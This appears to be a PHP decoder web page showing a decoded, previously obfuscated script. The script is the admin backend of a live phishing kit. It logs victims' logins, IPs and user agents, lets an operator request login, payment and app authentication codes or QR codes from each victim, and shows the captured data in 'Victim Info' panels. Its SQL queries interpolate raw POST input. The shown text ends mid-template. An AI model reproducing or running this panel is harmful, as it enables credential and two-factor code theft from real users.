Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto E6HN2; k0702: if ($_GET["\x74\x79\x70\x65"] == "\x6c\157\147\151\156") { if (..

Decoded Output download

<?php 
 goto E6HN2; k0702: if ($_GET["type"] == "login") { if ($_POST["usrlogin"] and $_POST["ip"] and $_POST["ua"]) { $usrlogin = $_POST["usrlogin"]; $ip = $_POST["ip"]; $comment = "New user logged into account"; $ua = urlencode($_POST["ua"]); $uniqueid = time(); if ($_SESSION["started"] == "true") { $uniqueid = $_SESSION["uniqueid"]; $query = mysqli_query($conn, "UPDATE customers SET status=1, buzzed=0, usrlogin='{$usrlogin}', comment='{$comment}', useragent='{$ua}', ip='{$ip}' WHERE uniqueid={$uniqueid}"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "db conn notok")); } } else { $_SESSION["uniqueid"] = $uniqueid; $_SESSION["started"] = "true"; $query = mysqli_query($conn, "INSERT INTO customers (usrlogin, comment, ip, useragent, uniqueid, status) VALUES ('{$usrlogin}', '{$comment}', '{$ip}', '{$ua}',{$uniqueid}, 1)"); if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "db conn notok")); } } } } goto DZlkO; s41oT: include "../vendor/index.php"; goto CXa0e; DZlkO: if ($_SESSION["admin_logged"] == "true") { if ($_GET["type"] == "commmand") { if ($_POST["userid"] and numeric($_POST["userid"]) == true and $_POST["status"] and numeric($_POST["status"]) == true) { $userid = $_POST["userid"]; $status = $_POST["status"]; $authcode = $_POST["authcode"]; $comment = "Admin has sent command"; if ($authcode != null and $authcode != '') { $query = mysqli_query($conn, "UPDATE customers SET comment='{$comment}', status='{$status}', authcode='{$authcode}' WHERE id={$userid}"); } else { $query = mysqli_query($conn, "UPDATE customers SET comment='{$comment}', status={$status} WHERE id={$userid}"); } if ($query) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "db conn error")); } } else { echo json_encode(array("status" => "command error")); } } if (isset($_GET["get_submitted"])) { $query = mysqli_query($conn, "SELECT * FROM customers WHERE status<=8 and buzzed=0"); if ($query) { $num = mysqli_num_rows($query); $array = mysqli_fetch_array($query, MYSQLI_ASSOC); if ($num >= 1) { echo json_encode(array("status" => "ok")); } else { echo json_encode(array("status" => "notok")); } } else { echo json_encode(array("status" => "notok")); } } if (isset($_GET["fetch_pc_data"])) { $query = mysqli_query($conn, "SELECT * from customers"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = array_filter(mysqli_fetch_all($query, MYSQLI_ASSOC)); } } foreach ($array as $value) { if ($value["status"] == 500) { $info = "<span class="badge badge-warning">Easter egg</span>"; } elseif ($value["status"] == 1) { $info = "<span class="badge badge-info">New User</span>"; } elseif ($value["status"] == 2) { $info = "<span class="badge badge-info">Uploaded QR</span>"; } elseif ($value["status"] == 11) { $info = "<span class="badge badge-primary">Awaiting Login Auth</span>"; } elseif ($value["status"] == 12) { $info = "<span class="badge badge-primary">Awaiting Payment Auth</span>"; } elseif ($value["status"] == 13) { $info = "<span class="badge badge-primary">Awaiting App Auth</span>"; } elseif ($value["status"] == 13) { $info = "<span class="badge badge-primary">Awaiting QR Code</span>"; } elseif ($value["status"] == 50) { $info = "<span class="badge badge-primary">Back to login</span>"; } elseif ($value["status"] == 100) { $info = "<span class="badge badge-info">INVALID</span>"; } elseif ($value["status"] == 20) { $info = "<span class="badge badge-success">Finished</span>"; } if ($value["status"] == 20) { $userStatus = "<span><img src="partial/img/off.png" style="width:20px;padding-right:1px"><b>Offline</b></span>"; echo "\xa	\x9		<tr style='color:white'>\xa			\x9	<td>{$value["id"]}</td>\xa\x9\x9\x9	\x9<td>{$value["usrlogin"]}</td>
\x9\x9\x9		<td>{$userStatus}</td>
\x9	\x9\x9	<td>{$value["ip"]}</td>
\x9\x9\x9\x9	<td>{$info}</td>
	\x9\x9\x9	<td>\xa	\x9	\x9\x9\x9<button type='button' onclick='view_logBtn(this)' class='btn btn-md btn-dark' id='userid_{$value["id"]}' data-toggle='modal' data-target='#viewmodal_userid_{$value["id"]}'>View Log</button>
\x9\x9\x9\x9\x9\x9<button type='button' class='btn btn-md btn-danger' id='userid_{$value["id"]}'onclick='deleteentry(this)'><i class='fa fa-trash' aria-hidden='true'></i></button>\xa\x9	\x9\x9	</td>\xa\x9	\x9	</tr>\xa	\x9\x9	"; } else { $userStatus = "<span><img src="partial/img/off.png" style="width:20px;padding-right:1px"><b>Offline</b></span>"; $savedStatus = $value["last_activity"]; if ($savedStatus !== null) { $user_main_status = new DateTime($savedStatus); $currentTime = new DateTime("now"); $indicator = $currentTime->getTimestamp() - $user_main_status->getTimestamp(); if ($indicator <= 8) { $userStatus = "<span><img src="partial/img/on.png" style="width:20px;padding-right:1px"><b>Online</b></span>"; } } else { if ($savedStatus === null) { $userStatus = "<span><img src="partial/img/na.png" style="width:25px;padding-right:1px"><b>No data</b></span>"; } } echo "
				<tr style='color:white'>\xa\x9	\x9\x9	<td>{$value["id"]}</td>
\x9\x9	\x9	<td>{$value["usrlogin"]}</td>
\x9\x9\x9	\x9<td>{$userStatus}</td>
	\x9\x9	\x9<td>{$value["ip"]}</td>\xa		\x9\x9	<td>{$value["comment"]}</td>\xa\x9\x9			<td>{$info}</td>\xa\x9	\x9\x9	<td>
	\x9	\x9\x9	<button type='button' onclick='controlBtn(this)' class='btn btn-md btn-info' id='userid_{$value["id"]}' data-toggle='modal' data-target='#modal_userid_{$value["id"]}'>Action</button>\xa	\x9\x9\x9\x9	<button type='button' class='btn btn-md btn-danger' id='userid_{$value["id"]}'onclick='deleteentry(this)'><i class='fa fa-trash' aria-hidden='true'></i></button>\xa\x9\x9			</td>\xa\x9\x9		</tr>
	\x9	\x9"; } } } if (isset($_GET["fetch_data"])) { $query = mysqli_query($conn, "SELECT * from customers"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = array_filter(mysqli_fetch_all($query, MYSQLI_ASSOC)); } } foreach ($array as $value) { if ($value["status"] == 500) { $info = "<span class="badge badge-warning">Easter egg</span>"; } elseif ($value["status"] == 1) { $info = "<span class="badge badge-info">New User</span>"; } elseif ($value["status"] == 2) { $info = "<span class="badge badge-info">Uploaded QR</span>"; } elseif ($value["status"] == 11) { $info = "<span class="badge badge-primary">Awaiting Login Auth</span>"; } elseif ($value["status"] == 12) { $info = "<span class="badge badge-primary">Awaiting Payment Auth</span>"; } elseif ($value["status"] == 13) { $info = "<span class="badge badge-primary">Awaiting App Auth</span>"; } elseif ($value["status"] == 13) { $info = "<span class="badge badge-primary">Awaiting QR Code</span>"; } elseif ($value["status"] == 50) { $info = "<span class="badge badge-primary">Back to login</span>"; } elseif ($value["status"] == 100) { $info = "<span class="badge badge-info">INVALID</span>"; } elseif ($value["status"] == 20) { $info = "<span class="badge badge-success">Finished</span>"; } if ($value["status"] == 20) { $userStatus = "<span><img src="partial/img/off.png" style="width:20px;padding-right:1px"><b>Offline</b></span>"; echo "
\x9			<tr style='color:white'>
	\x9\x9	\x9<td>{$value["id"]}</td>
	\x9		\x9<td>{$value["usrlogin"]}</td>
\x9\x9		\x9<td>{$userStatus}</td>\xa		\x9	\x9<td>{$value["ip"]}</td>\xa\x9\x9	\x9	<td>{$info}</td>
\x9		\x9\x9<td>\xa			\x9\x9\x9<button type='button' onclick='view_logBtn(this)' class='btn btn-md btn-dark' id='userid_{$value["id"]}' data-toggle='modal' data-target='#viewmodal_userid_{$value["id"]}'>View Log</button>\xa\x9		\x9		<button type='button' class='btn btn-md btn-danger' id='userid_{$value["id"]}'onclick='deleteentry(this)'><i class='fa fa-trash' aria-hidden='true'></i></button>
\x9			\x9</td>\xa\x9	\x9\x9</tr>
\x9			"; } else { $userStatus = "<span><img src="partial/img/off.png" style="width:20px;padding-right:1px"><b>Offline</b></span>"; $savedStatus = $value["last_activity"]; if ($savedStatus !== null) { $user_main_status = new DateTime($savedStatus); $currentTime = new DateTime("now"); $indicator = $currentTime->getTimestamp() - $user_main_status->getTimestamp(); if ($indicator <= 8) { $userStatus = "<span><img src="partial/img/on.png" style="width:20px;padding-right:1px"><b>Online</b></span>"; } } else { if ($savedStatus === null) { $userStatus = "<span><img src="partial/img/na.png" style="width:25px;padding-right:1px"><b>No data</b></span>"; } } echo "\xa\x9		\x9<tr style='color:white'>
\x9\x9\x9\x9\x9<td>{$value["id"]}</td>\xa		\x9\x9	<td>{$value["usrlogin"]}</td>\xa		\x9\x9\x9<td>{$userStatus}</td>\xa\x9		\x9	<td>{$info}<br>{$value["comment"]}</td>
		\x9	\x9<td>
		\x9	\x9	<button type='button' onclick='controlBtn(this)' class='btn btn-md btn-info' id='userid_{$value["id"]}' data-toggle='modal' data-target='#modal_userid_{$value["id"]}'>Action</button>
					\x9<button type='button' class='btn btn-md btn-danger' id='userid_{$value["id"]}'onclick='deleteentry(this)'><i class='fa fa-trash' aria-hidden='true'></i></button>\xa		\x9		</td>\xa\x9\x9		</tr>
\x9\x9	\x9"; } } } if (isset($_GET["fetch_pc_modal_data"])) { $query = mysqli_query($conn, "SELECT * from customers"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["usrlogin"]; $authcode = $value["authcode"]; $filepath = $value["filepath"]; $ip = $value["ip"]; $useragent = urldecode($value["useragent"]); $data_log = "\xa		\x9=====> LOGIN <=====\xa	\x9	Username : {$usrlogin}
\x9\x9	Auth Code : {$authcode}
\x9\x9	===============================
\x9		IP : {$ip}
\x9\x9	UA : {$useragent}\xa		\x9==============================="; echo "
	
	\x9	<div class='modal fade' id='modal_userid_{$value["id"]}' tabindex='-1' role='dialog' aria-labelledby='exampleModalLabel' aria-hidden='true' style='opacity:1 !important;display:none;height:100%;overflow:scroll;'>\xa		\x9\x9<form name='config_form_{$value["id"]}' id='config_form_{$value["id"]}' method='POST' action='' novalidate>\xa		\x9\x9\x9<input type='hidden' name='userid' value='{$value["id"]}'>\xa\x9				<div class='modal-dialog' role='document' style='width:500px'>\xa	\x9\x9	\x9	<div class='modal-content' style='background-color: black;'>\xa		\x9		\x9\x9<div class='modal-header' style='background-color:#34495E;font-size:2.7rem;text-align:center;'>
\x9		\x9\x9	\x9\x9<h5 class='modal-title' id='exampleModalLabel' style='color:white'>Admin Control</h5>
			\x9				<button type='button' class='close' onclick='close_btn()' aria-label='Close'>
\x9\x9\x9	\x9			\x9<span aria-hidden='true' style='color:white'>&times;</span>
\x9	\x9					</button>\xa			\x9	\x9	</div>\xa		\x9\x9\x9\x9	<div class='modal-body'>
\x9\x9\x9	\x9\x9\x9	<div class='form-group' style='margin-bottom:1rem'>
\x9					\x9\x9\x9<br>
\x9	\x9\x9\x9\x9		\x9<textarea id='textareaoptions' class='form-control' disabled='disabled' rows='16' style='height:300px;'>{$data_log}</textarea>
		\x9	\x9		\x9\x9<br>\xa		\x9\x9		\x9	\x9<center><img src='{$filepath}' width='100px' alt='no image to display'></center>
\x9\x9\x9\x9		\x9	</div>\xa\x9			\x9		\x9\x9\xa		\x9\x9\x9\x9\x9\x9<table style='width: 100%;background-color: black;color: white;padding: 10%;'>
			\x9	\x9\x9\x9	<tbody style='line-height:100%;'>\xa		\x9				\xa\x9\x9	\x9\x9			\x9\x9<tr>\xa\x9\x9	\x9\x9			\x9\x9\x9<td>
				\x9	\x9\x9		\x9\x9<div class='form-check'>
		\x9	\x9			\x9\x9		\x9<label for='askcharsradio0{$value["id"]}' class='form-check-label'>\xa\x9	\x9\x9\x9	\x9			\x9	\x9\x9<input type='radio' name='status' value='11' id='askcharsradio0{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>
\x9\x9\x9			\x9	\x9	\x9\x9	\x9<span>Request Login Auth</span>
	\x9\x9\x9\x9\x9\x9	\x9		\x9\x9</label>
	\x9	\x9\x9\x9		\x9\x9\x9	</div>\xa\x9		\x9	\x9				\x9\x9<!-- Input characters -->\xa	\x9	\x9	\x9	\x9	\x9		<div class='form-group' style='display:none;' id='askchars0{$value["id"]}'>\xa\x9	\x9	\x9	\x9	\x9	\x9\x9	<div class='row' style='margin-left:5%;margin-top:5px' >
\x9	\x9	\x9\x9	\x9\x9\x9\x9	\x9\x9<div class='col'>\xa	\x9	\x9			\x9\x9\x9\x9			\x9<input type='text' class='form-control' placeholder='Enter code here' name='authcode' id='authcode' style='width:80%;border-color:#d6d6e5'>
	\x9			\x9	\x9\x9\x9		\x9	</div>\xa\x9\x9	\x9	\x9	\x9		\x9\x9\x9</div>\xa	\x9		\x9\x9\x9\x9	\x9\x9	</div>
\x9\x9\x9\x9\x9	\x9\x9		\x9</td>
\x9	\x9\x9\x9\x9	\x9\x9	\x9<td>
\x9\x9\x9			\x9	\x9\x9\x9	<div class='form-check'>
\x9\x9\x9				\x9	\x9	\x9\x9<label for='askcharsradio1{$value["id"]}' class='form-check-label'>
	\x9\x9\x9\x9\x9			\x9	\x9\x9	<input type='radio' name='status' value='12' id='askcharsradio1{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>\xa\x9	\x9		\x9				\x9\x9\x9	<span>Request Payment Auth</span>\xa	\x9		\x9		\x9			\x9\x9</label>\xa\x9\x9\x9\x9	\x9\x9					</div>\xa\x9\x9\x9								</td>
			\x9\x9	\x9			</tr>
		\x9\xa\x9\x9		\x9\x9	\x9	\x9<tr>\xa	\x9\x9	\x9\x9	\x9\x9\x9	<td>
\x9				\x9\x9\x9\x9		\x9<div class='form-check'>\xa\x9\x9\x9	\x9\x9\x9		\x9\x9\x9\x9<label for='askcharsradio2{$value["id"]}' class='form-check-label'>\xa\x9		\x9				\x9	\x9		\x9<input type='radio' name='status' value='13' id='askcharsradio2{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>\xa	\x9\x9	\x9\x9\x9		\x9	\x9\x9	<span>Request App Auth</span>\xa	\x9	\x9			\x9\x9\x9		\x9</label>\xa\x9\x9			\x9	\x9\x9	\x9	</div>\xa\x9\x9\x9	\x9		\x9\x9\x9\x9</td>
		\x9				\x9\x9\x9\x9<td>\xa		\x9	\x9		\x9	\x9	\x9<div class='form-check'>\xa\x9		\x9			\x9\x9\x9\x9	\x9<label for='askcharsradio3{$value["id"]}' class='form-check-label'>
\x9	\x9\x9	\x9	\x9\x9	\x9	\x9	<input type='radio' name='status' value='14' id='askcharsradio3{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>\xa	\x9\x9		\x9\x9			\x9	\x9	<span>Request QR Code</span>
	\x9		\x9\x9\x9		\x9\x9\x9	</label>\xa		\x9			\x9\x9\x9\x9\x9	</div>
\x9			\x9\x9	\x9		\x9</td>\xa\x9\x9		\x9\x9	\x9	\x9</tr>
\x9	\x9\xa	\x9\x9\x9	\x9	\x9\x9\x9<tr>\xa\x9	\x9		\x9	\x9\x9		<td>
\x9	\x9\x9\x9			\x9	\x9\x9<div class='form-check'>
\x9	\x9	\x9								<label for='askloginradio{$value["id"]}' class='form-check-label'>\xa\x9\x9\x9	\x9\x9	\x9	\x9	\x9\x9	<input type='radio' name='status' checked value='50' id='askloginradio{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>\xa\x9\x9			\x9		\x9				\x9<span>Request login again </span>
	\x9				\x9				\x9\x9</label>\xa\x9\x9\x9	\x9		\x9\x9\x9	\x9</div>
		\x9\x9\x9\x9	\x9\x9\x9\x9</td>
	\x9	\x9		\x9		\x9\x9<td>\xa			\x9				\x9\x9	\x9<div class='form-check'>
	\x9	\x9\x9	\x9\x9	\x9\x9\x9	<label for='sendawayradio{$value["id"]}' class='form-check-label'>
\x9\x9	\x9	\x9\x9\x9	\x9	\x9\x9\x9<input type='radio' name='status' value='100' id='sendawayradio{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>
\x9\x9	\x9\x9	\x9			\x9\x9\x9	<span>Invalid, Send away</span>\xa\x9	\x9\x9		\x9\x9\x9	\x9	\x9</label>
\x9\x9	\x9	\x9\x9\x9\x9	\x9	</div>\xa	\x9		\x9\x9\x9\x9\x9\x9\x9</td>
	\x9\x9	\x9					</tr>
			\x9\x9\x9	\x9		\xa\x9\x9				\x9\x9	\x9<tr>\xa\x9\x9\x9\x9\x9		\x9\x9	\x9<td>\xa	\x9	\x9\x9\x9	\x9	\x9		<div class='form-check'>\xa			\x9\x9								<label for='finishradio{$value["id"]}' class='form-check-label'>\xa	\x9\x9\x9	\x9	\x9\x9\x9\x9	\x9\x9<input type='radio' name='status' value='20' id='finishradio{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>
\x9				\x9			\x9		\x9	<span>Finish</span>\xa	\x9		\x9		\x9	\x9		\x9</label>
\x9		\x9\x9\x9	\x9\x9	\x9	</div>\xa\x9\x9\x9	\x9\x9		\x9\x9\x9</td>
		\x9							</tr>

	\x9\x9\x9	\x9\x9			\xa	\x9\x9\x9	\x9	\x9\x9</tbody>
		\x9\x9\x9\x9\x9\x9</table>\xa\x9\x9\x9\x9\x9\x9	</div>
\x9\x9\x9\x9\x9		<!-- End commands edit -->\xa
\x9	\x9\x9\x9		<div class='modal-footer' style='margin-top:-40px'>
\x9\x9\x9					<button type='button' class='btn btn-secondary' onclick='close_btn()' data-dismiss='modal'>Close</button>
\x9\x9				\x9\x9<button id='save_{$value["id"]}' onclick='form_submit(this)' type='button' class='btn btn-primary'>Save</button>
\x9\x9\x9\x9\x9\x9	</div>\xa				\x9\x9</div>
	\x9	\x9\x9</div>\xa\x9	\x9	</form>\xa	\x9\x9</div>
\x9\x9	"; } } if (isset($_GET["fetch_pc_finish_modal_data"])) { $query = mysqli_query($conn, "SELECT * from customers"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["usrlogin"]; $authcode = $value["authcode"]; $filepath = $value["filepath"]; $ip = $value["ip"]; $useragent = urldecode($value["useragent"]); $data_log = "\xa	\x9\x9=====> LOGIN <=====\xa\x9\x9	Username : {$usrlogin}
		\x9Auth Code : {$authcode}\xa\x9		===============================\xa		\x9IP : {$ip}\xa	\x9	UA : {$useragent}
\x9\x9\x9==============================="; echo "\xa	\x9\x9
		\x9<div class='modal fade' id='viewmodal_userid_{$value["id"]}' tabindex='-1' role='dialog' aria-labelledby='exampleModalLabel' style='opacity:1 !important;display:none;height:100%;overflow:scroll;' aria-hidden='true'>
\x9	\x9\xa\x9		\x9<form name='config_form_{$value["id"]}' id='config_form_{$value["id"]}' method='POST' action='' novalidate>
	\x9			<input type='hidden' name='userid' value='{$value["id"]}'>\xa	\x9\x9		<div class='modal-dialog' role='document' style='width:500px'>
			\x9		<div class='modal-content'>
\x9					\x9<div class='modal-header' style='background-color:#34495E;font-size:2.7rem;text-align:center;'>
	\x9\x9\x9\x9	\x9\x9<h5 class='modal-title' id='exampleModalLabel' style='color:white'>Victim Info</h5>\xa	\x9		\x9\x9	\x9<button type='button' class='close' data-dismiss='modal' aria-label='Close'>\xa	\x9\x9	\x9\x9	\x9\x9<span aria-hidden='true' style='color:white'>&times;</span>
\x9\x9			\x9\x9\x9</button>\xa	\x9\x9	\x9		</div>
\x9	\x9			\x9<div class='modal-body'>\xa\x9\x9\x9\x9	\x9		<div class='form-group'>
	\x9		\x9\x9\x9	\x9<br>
		\x9\x9\x9			\x9<textarea id='textareafinish' class='form-control' disabled='disabled' rows='12'>{$data_log}</textarea>\xa		\x9\x9\x9			\x9<br>
\x9\x9\x9\x9\x9	\x9\x9	<center><img src='{$filepath}' width='100px' alt='no image to display'></center>\xa\x9			\x9\x9\x9\x9</div>\xa\x9	\x9	\x9\x9	</div>\xa\x9			\x9\x9\x9<div class='modal-footer' style='margin-top:-40px'>\xa\x9	\x9	\x9\x9\x9	<button type='button' class='btn btn-lg btn-dark col-12' onclick='close_btn()'>CLOSE</button>\xa\x9	\x9	\x9		</div>\xa						</div>\xa			\x9\x9</div>
\x9\x9		</form>\xa		\x9</div>\xa\x9		"; } } if (isset($_GET["fetch_modal_data"])) { $query = mysqli_query($conn, "SELECT * from customers"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["usrlogin"]; $authcode = $value["authcode"]; $filepath = $value["filepath"]; $ip = $value["ip"]; $useragent = urldecode($value["useragent"]); echo "\xa	\xa\x9\x9	<div class='modal fade' id='modal_userid_{$value["id"]}' tabindex='-1' role='dialog' style='opacity:1 !important;display:none;height:100%;overflow:scroll;' aria-labelledby='exampleModalLabel' aria-hidden='true'>\xa			\xa				<form name='config_form_{$value["id"]}' id='config_form_{$value["id"]}' method='POST' action='' novalidate>
\x9		\x9<input type='hidden' name='userid' value='{$value["id"]}'>
\x9\x9\x9	<div class='modal-dialog' role='document' style='margin-top:20%;max-width:100%;font-size:1.2rem;'>\xa\x9	\x9	<div class='modal-content' style='background-color: black;'>
\x9\x9\x9	\x9<div class='modal-header' style='background-color:#34495E;font-size:2.7rem;text-align:center;'>\xa	\x9	\x9	<h5 class='modal-title' id='exampleModalLabel' style='color:white;font-size:1.2rem'>Admin Control (click on log to auto-copy)</h5>
	\x9	\x9\x9<button type='button' class='close' onclick='close_btn()'  aria-label='Close'>
	\x9	\x9		<span aria-hidden='true' style='color:white'>&times;</span>\xa\x9\x9	\x9	</button>\xa\x9\x9\x9	\x9</div>\xa\x9	\x9\x9	<div class='modal-body'>\xa\x9	\x9\xa\x9	\x9		<div class='form-group' style='margin-bottom:1rem'>
	\x9\x9\x9	\x9<br>\xa			\x9\x9\x9<center><img src='{$filepath}' style='width:70px;border-radius:10px' alt='no image to display'></center>
\x9\x9		\x9\x9<br>\xa\xa	\x9				<div class='data-group'>
		\x9\x9	\x9\x9<label class='data-label'>Username</label>
	\x9\x9\x9\x9\x9\x9<input onclick='copy_btn(this)' class='form-control' readonly value='{$usrlogin}'>\xa		\x9\x9\x9\x9</div>
\x9\x9\x9\x9		<div class='data-group'>
\x9\x9	\x9\x9	\x9<label class='data-label'>Auth Code</label>\xa\x9\x9\x9\x9	\x9	<input onclick='copy_btn(this)' class='form-control' readonly value='{$authcode}'>\xa		\x9	\x9\x9</div>\xa		\x9\x9		<div class='data-group'>\xa\x9		\x9\x9\x9\x9<label class='data-label'>IP/Device</label>\xa	\x9		\x9\x9\x9<input onclick='copy_btn(this)' class='form-control' readonly value='{$ip} [{$useragent}]'>
		\x9\x9	\x9</div>
\x9\x9	\x9	\x9<br>
	\x9\x9\x9	</div>\xa					\xa		\x9	\x9<!-- END -->
	\x9	\x9\x9\xa\x9	\x9		<table style='width: 100%;background-color: black;color: white;padding: 10%;'>\xa\x9\x9\x9\x9	\x9<tbody style='line-height:100%;'>
				\x9		\xa\x9\x9\x9\x9	\x9	<tr>\xa\x9		\x9		\x9	<td>
	\x9	\x9			\x9\x9<div class='form-check'>
\x9\x9			\x9	\x9\x9	<label for='askcharsradio0{$value["id"]}' class='form-check-label'>\xa\x9\x9		\x9	\x9\x9	\x9	<input type='radio' name='status' value='11' id='askcharsradio0{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>\xa\x9			\x9\x9	\x9\x9		<span>Request Login Auth</span>
\x9\x9			\x9\x9		\x9</label>\xa\x9			\x9\x9		\x9</div>
\x9\x9			\x9\x9\x9\x9<!-- Input characters -->\xa\x9\x9\x9		\x9\x9\x9	<div class='form-group' style='display:none;' id='askchars0{$value["id"]}'>
\x9		\x9\x9		\x9		<div class='row' style='margin-left:5%;margin-top:5px' >
\x9\x9\x9\x9		\x9\x9	\x9	<div class='col'>
\x9\x9	\x9\x9\x9	\x9				<input type='text' class='form-control' placeholder='Enter code here' name='authcode' id='authcode' style='width:80%;border-color:#d6d6e5'>
	\x9	\x9\x9\x9	\x9\x9		</div>\xa	\x9\x9	\x9		\x9\x9	</div>\xa			\x9\x9\x9	\x9\x9</div>
\x9\x9\x9\x9				</td>\xa\x9\x9\x9		\x9\x9	<td>\xa	\x9\x9\x9\x9\x9\x9	\x9<div class='form-check'>\xa\x9	\x9	\x9\x9\x9\x9		<label for='askcharsradio1{$value["id"]}' class='form-check-label'>\xa\x9	\x9				\x9	\x9	<input type='radio' name='status' value='12' id='askcharsradio1{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>
	\x9\x9		\x9\x9\x9\x9\x9\x9<span>Request Payment Auth</span>
		\x9		\x9\x9\x9		</label>\xa\x9\x9	\x9\x9	\x9		</div>\xa	\x9\x9\x9\x9\x9		</td>
\x9		\x9\x9\x9	</tr>\xa\xa\x9\x9			\x9\x9<tr>\xa	\x9		\x9	\x9	<td>
	\x9	\x9	\x9		\x9<div class='form-check'>
\x9		\x9\x9\x9				<label for='askcharsradio2{$value["id"]}' class='form-check-label'>\xa\x9\x9\x9	\x9	\x9	\x9	\x9<input type='radio' name='status' value='13' id='askcharsradio2{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>\xa\x9	\x9		\x9		\x9		<span>Request App Auth</span>
\x9\x9				\x9			</label>\xa\x9						\x9\x9</div>\xa	\x9\x9\x9				</td>
\x9	\x9	\x9			<td>\xa	\x9	\x9\x9\x9	\x9	<div class='form-check'>
	\x9	\x9						<label for='askcharsradio3{$value["id"]}' class='form-check-label'>\xa	\x9\x9		\x9\x9\x9\x9\x9\x9<input type='radio' name='status' value='14' id='askcharsradio3{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>\xa\x9		\x9	\x9			\x9	<span>Request QR Code</span>\xa			\x9\x9		\x9\x9\x9</label>\xa\x9				\x9\x9\x9	</div>
	\x9\x9\x9\x9			</td>\xa	\x9\x9\x9\x9\x9\x9</tr>\xa
\x9		\x9\x9\x9	<tr>
\x9\x9\x9			\x9	<td>
\x9\x9\x9					\x9<div class='form-check'>
\x9	\x9	\x9	\x9\x9	\x9<label for='askloginradio{$value["id"]}' class='form-check-label'>\xa\x9\x9		\x9\x9	\x9\x9		<input type='radio' name='status' checked value='50' id='askloginradio{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>\xa\x9					\x9		\x9\x9<span>Request login again </span>
	\x9\x9	\x9	\x9\x9\x9	</label>\xa				\x9		\x9\x9</div>
			\x9	\x9		</td>
	\x9\x9	\x9\x9		<td>
\x9\x9\x9	\x9\x9\x9	\x9<div class='form-check'>\xa\x9		\x9		\x9			<label for='sendawayradio{$value["id"]}' class='form-check-label'>
	\x9\x9\x9	\x9\x9		\x9\x9<input type='radio' name='status' value='100' id='sendawayradio{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>
	\x9	\x9	\x9\x9	\x9\x9\x9<span>Invalid, Send away</span>
		\x9	\x9\x9\x9	\x9\x9</label>
\x9\x9\x9\x9	\x9			</div>\xa\x9\x9		\x9\x9		</td>
\x9	\x9\x9\x9\x9\x9</tr>\xa\x9		\x9\x9		\xa\x9\x9					<tr>\xa\x9\x9\x9		\x9\x9\x9<td>\xa	\x9	\x9\x9\x9	\x9	<div class='form-check'>
	\x9	\x9\x9\x9		\x9\x9<label for='finishradio{$value["id"]}' class='form-check-label'>
				\x9	\x9		\x9\x9<input type='radio' name='status' value='20' id='finishradio{$value["id"]}' onclick='showfields({$value["id"]});' class='status form-check-input'>\xa\x9							\x9	\x9<span>Finish</span>\xa		\x9\x9	\x9\x9\x9\x9\x9</label>
		\x9\x9\x9\x9\x9\x9\x9</div>
\x9						\x9</td>\xa\x9	\x9		\x9	</tr>

\x9			\x9\x9\x9
		\x9	\x9	</tbody>\xa	\x9	\x9\x9</table>\xa\x9\x9	\xa\x9\x9\x9	\xa			\xa	\x9\x9	
			
\x9\x9\x9</div>
	\x9	<!-- End commands edit -->\xa			\xa\x9\x9\x9<div class='modal-footer' style='margin-top:-40px'>
\x9	\x9\x9<button type='button' class='btn btn-secondary' onclick='close_btn()' >Close</button>\xa	\x9		<button id='save_{$value["id"]}' onclick='form_submit(this)' type='button' class='btn btn-primary'>Save</button>
\x9		</div>\xa\x9\x9	</div>\xa	\x9	</div>\xa			</form>
		\x9</div>
\x9		\xa	\x9	<div class='modal fade' id='viewmodal_userid_{$value["id"]}' tabindex='-1' role='dialog' style='opacity:1 !important;display:none;height:100%;overflow:scroll;' aria-labelledby='exampleModalLabel' aria-hidden='true'>
\x9\x9	\xa\x9\x9\x9<form name='config_form_{$value["id"]}' id='config_form_{$value["id"]}' method='POST' action='' novalidate>\xa\x9		<input type='hidden' name='userid' value='{$value["id"]}'>\xa	\x9	<div class='modal-dialog' role='document' style='width:500px'>\xa\x9		<div class='modal-content'>
\x9	\x9<div class='modal-header' style='background-color:#34495E;font-size:2.7rem;text-align:center;'>\xa\x9\x9\x9\x9<h5 class='modal-title' id='exampleModalLabel' style='color:white'>Victim Info</h5>\xa				<button type='button' class='close' onclick='close_btn()'  aria-label='Close'>
					<span aria-hidden='true' style='color:white'>&times;</span>\xa\x9\x9	\x9</button>
	\x9\x9</div>\xa\x9\x9\x9<div class='modal-body'>
\x9	\x9\xa\x9\x9\x9<div class='form-group'>
\x9		<br>\xa\x9		<textarea id='textareafinish' class='form-control' disabled='disabled' rows='12'>{$data_log}</textarea>
	\x9\x9</div>\xa			
	\x9	\xa			\xa	\x9\x9</div>\xa			<div class='modal-footer' style='margin-top:-40px'>
\x9\x9\x9<button type='button' onclick='close_btn()' class='btn btn-lg btn-dark col-12' >CLOSE</button>\xa	\x9	\xa\x9\x9\x9</div>
\x9\x9	</div>
\x9\x9\x9</div>\xa			</form>\xa\x9\x9\x9</div>
\x9	\x9\xa	\x9\x9
